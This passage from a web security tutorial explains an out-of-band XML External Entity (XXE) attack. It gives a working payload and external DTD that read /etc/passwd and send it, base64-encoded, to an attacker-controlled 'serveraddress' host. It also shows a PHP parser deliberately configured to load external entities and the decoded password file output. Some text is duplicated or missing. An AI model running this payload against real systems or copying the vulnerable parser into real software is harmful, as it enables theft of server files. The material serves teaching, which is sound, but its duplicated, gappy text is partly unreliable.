But there is a way to get the response from the web application in Out Of Bound situation, and this is done by forcing the XML parser make additional request to an attacker controlled server in order to read the extracted data from the web server.
Now in this attack there are three main components :
- Payload
- file.dtd (XML External Entity declaration file)
- An attacker Controlled Server (To collect the data)
doc.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY % remote SYSTEM "http://serveraddress/file.dtd"> %remote; %newEnt; %send; ]> <book> <name>The Art of War</name> <author>Sun Tzu</author> <price>370</price> </book>
At above remote entity reference includes the external DTD file. COntent of dtd file is :
file.dtd :
Note that in the payload :
file.dtd :
<!ENTITY % dat SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> <!ENTITY % newEnt "<!ENTITY % send SYSTEM 'http://serveraddress/?data=%dat;'>">
Note that in the payload :
- At line 4 "%remote" includes the file.dtd into xml document
- At line 5 the entity "%newEnt" which declared in file.dtd, will declare new entity "send" which make an additional request to the attacker controlled server with the data, which is implemented at the end of the line "%dat" (look at the 2nd line of file.dtd). Where the "%dat" is declared within the file.dtd.
- Also note that in file.dtd, the entity value "%" is nothing but the hexadecimal representation of "%", because the xml parser does not allow using "%" inside entity declaration, and the file "/etc/password" is base64 encoded because it help to parsing of the data.
Now lets first customize our xml parser so it would not show the result. The code will be :
parser.php
parser.php
<html>
<head>
<title>XML Parser</title>
</head>
<body>
<h2>Enter XML Code Here :</h2>
<form action="" method="post">
<textarea name="xml" rows="10" cols="50"></textarea><br/>
<input type="submit" value="Submit"/>
</form>
<?php
if(!empty($_POST["xml"])) {
libxml_disable_entity_loader (false);
$xmlfile = $_POST["xml"];
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$book = simplexml_import_dom($dom);
}
?>
</body>
</html>
Now the above php code does not show any output.
First start a python server in your system by
and the decoded base64 data is :
Conclusion :
In these posts we are look at some of the attack vector with are used to exploit XML parser functionalities.
Codes used above can be downloaded form here : Github_link
XML Attacks Part 1 : Basic of XML structure and attack surface
XML Attacks Part 2 : XXE (Xml eXternal Entity ) Attack
XML Attacks Part 3 : Denial Of Service Attacks
To learn more about web application Security please visit below link :
http://www.sec-art.net/p/web-security.html
First start a python server in your system by
python -m SimpleHTTPServer 
and the decoded base64 data is :
ajay@DevM:~$ echo "cm9vdDp4OjA6MDpy......vYmluL2Jhc2gK" | base64 -d root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false syslog:x:104:108::/home/syslog:/bin/false _apt:x:105:65534::/nonexistent:/bin/false lxd:x:106:65534::/var/lib/lxd/:/bin/false mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false messagebus:x:108:112::/var/run/dbus:/bin/false uuidd:x:109:113::/run/uuidd:/bin/false dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin ajay:x:1000:1000:ajay,,,:/home/ajay:/bin/bash
Conclusion :
In these posts we are look at some of the attack vector with are used to exploit XML parser functionalities.
Codes used above can be downloaded form here : Github_link
XML Attacks Part 1 : Basic of XML structure and attack surface
XML Attacks Part 2 : XXE (Xml eXternal Entity ) Attack
XML Attacks Part 3 : Denial Of Service Attacks
To learn more about web application Security please visit below link :
http://www.sec-art.net/p/web-security.html